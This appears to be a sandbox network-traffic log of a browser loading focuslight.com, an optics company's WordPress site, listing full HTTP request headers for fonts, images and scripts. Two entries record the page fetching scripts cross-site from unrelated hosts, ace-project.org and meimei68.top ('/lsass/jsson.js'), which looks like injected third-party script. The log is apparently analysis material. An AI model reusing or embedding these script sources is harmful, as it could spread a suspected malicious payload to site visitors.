Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Manrope-Regular.woff2 HTTP/1.1host: www.focuslight.comorigin: https://www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Manrope-Bold.woff2 HTTP/1.1host: www.focuslight.comorigin: https://www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/js/countUp.min.js HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo.svg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/09/02%E5%8D%8A%E5%AF%BC%E4%BD%93%E6%BF%80%E5%85%89%E5%85%83%E5%99%A8%E4%BB%B6.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/08/03%E6%BF%80%E5%85%89%E5%85%89%E5%AD%A6%E5%85%83%E5%99%A8%E4%BB%B6.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/08/01%E5%8E%9F%E6%9D%90%E6%96%99.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/07/04%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/09/Optical-coating-3.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /d.js HTTP/1.1Host: ace-project.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/grzxicn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/grzxicnred0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3AbPdawTdpo235d&MD=4WrkVZ6r HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic HTTP traffic detected: GET /lsass/jsson.js HTTP/1.1Host: meimei68.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Heptagon-Logo.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Heptagon-Logo-white.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/gwcicnred0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/gwcicn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/sousuo0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/01/2025-2-28-%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90-EN-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/05/LWOP-EN-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/03/V-groove-EN-1-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/03/Global-Optimization-EN-1-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo1.svg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jticn0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jticn1.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn1.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn2.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/spvideicn.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jiantouup.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/clicook.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jtrired1.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/xiangxia.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jtlered0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/01/%E8%BF%91%E6%9C%9F%E5%8F%82%E5%B1%95%E4%BF%A1%E6%81%AFEN.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/closevideo0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/dtimg.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/20230911094506.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn2.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn3.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/weixincodeimage.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo1.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/03/V-groove-EN-1-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
